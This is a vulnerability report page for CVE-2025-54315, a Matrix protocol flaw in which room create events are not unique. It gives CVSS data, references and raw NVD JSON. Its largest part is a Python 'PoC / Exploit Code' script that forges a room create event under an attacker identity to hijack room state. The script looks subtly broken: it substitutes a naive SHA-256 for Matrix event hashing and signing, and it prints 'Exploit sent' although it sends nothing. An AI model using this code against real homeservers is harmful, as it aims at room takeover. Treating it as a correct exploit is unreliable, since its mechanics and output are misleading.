Security Vulnerability Report
CVE-2025-54315 CVSS 7.1 HIGH

CVE-2025-54315

Published: 2025-10-02 19:15:31
Last Modified: 2026-04-15 00:35:42

Description

The Matrix specification before 1.16 (i.e., with a room version before 12) lacks create event uniqueness.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Matrix Specification < 1.16
Matrix Room Version < 12 (i.e., all implementations of room versions 1-11)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54315 PoC - Matrix Create Event Uniqueness Bypass
# This PoC demonstrates how to exploit the lack of create event uniqueness
# in Matrix protocol specification before 1.16 (room version < 12)
import json
import hashlib


# Step 1: Construct a malicious create event with forged sender
def create_malicious_event(original_event, forged_sender):
    """
    Create a malicious create event that mimics the original but with
    a different sender field, exploiting the lack of uniqueness check.
    """
    malicious_event = original_event.copy()
    malicious_event["sender"] = forged_sender  # Forge the creator identity
    # Keep the same type, room_id, and state_key as the original
    malicious_event["type"] = "m.room.create"
    malicious_event["state_key"] = ""  # create events have empty state_key
    # Recalculate hashes (simplified for demonstration)
    event_content = json.dumps(malicious_event, sort_keys=True).encode()
    malicious_event["hashes"] = {
        "sha256": hashlib.sha256(event_content).hexdigest()
    }
    return malicious_event


# Step 2: Simulate state resolution exploit
def exploit_state_resolution(room_id, original_create_event, attacker_user_id):
    """
    Exploit the state resolution algorithm by injecting a forged
    create event into the room state.
    """
    print(f"[*] Targeting room: {room_id}")
    print(f"[*] Original creator: {original_create_event['sender']}")
    print(f"[*] Attacker forging as: {attacker_user_id}")
    # Create the malicious event
    malicious_event = create_malicious_event(original_create_event, attacker_user_id)
    # In a real exploit, this event would be sent to the homeserver
    # via the Matrix client-server API:
    # PUT /_matrix/client/v3/rooms/{roomId}/state/m.room.create/
    # With body: { "creator": attacker_user_id, "room_version": "11" }
    print(f"[+] Malicious create event constructed:")
    print(json.dumps(malicious_event, indent=2))
    print(f"[!] Exploit sent - awaiting state resolution on target homeserver")
    return malicious_event


# Example usage (for room version < 12)
if __name__ == "__main__":
    original_event = {
        "sender": "@legitimate_user:matrix.org",
        "type": "m.room.create",
        "state_key": "",
        "content": {
            "creator": "@legitimate_user:matrix.org",
            "room_version": "11"
        },
        "room_id": "!exampleRoom:matrix.org"
    }
    attacker = "@attacker:evil.example.com"
    exploit_state_resolution(
        "!exampleRoom:matrix.org",
        original_event,
        attacker
    )

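References

https://github.com/matrix-org/matrix-spec/releases/tag/v1.16
https://matrix.org/blog/2025/08/project-hydra-improving-state-res/
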
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54315", "sourceIdentifier": "[email protected]", "published": "2025-10-02T19:15:31.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Matrix specification before 1.16 (i.e., with a room version before 12) lacks create event uniqueness."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-837"}]}], "references": [{"url": "https://github.com/matrix-org/matrix-spec/releases/tag/v1.16", "source": "[email protected]"}, {"url": "https://matrix.org/blog/2025/08/project-hydra-improving-state-res/", "source": "[email protected]"}]}}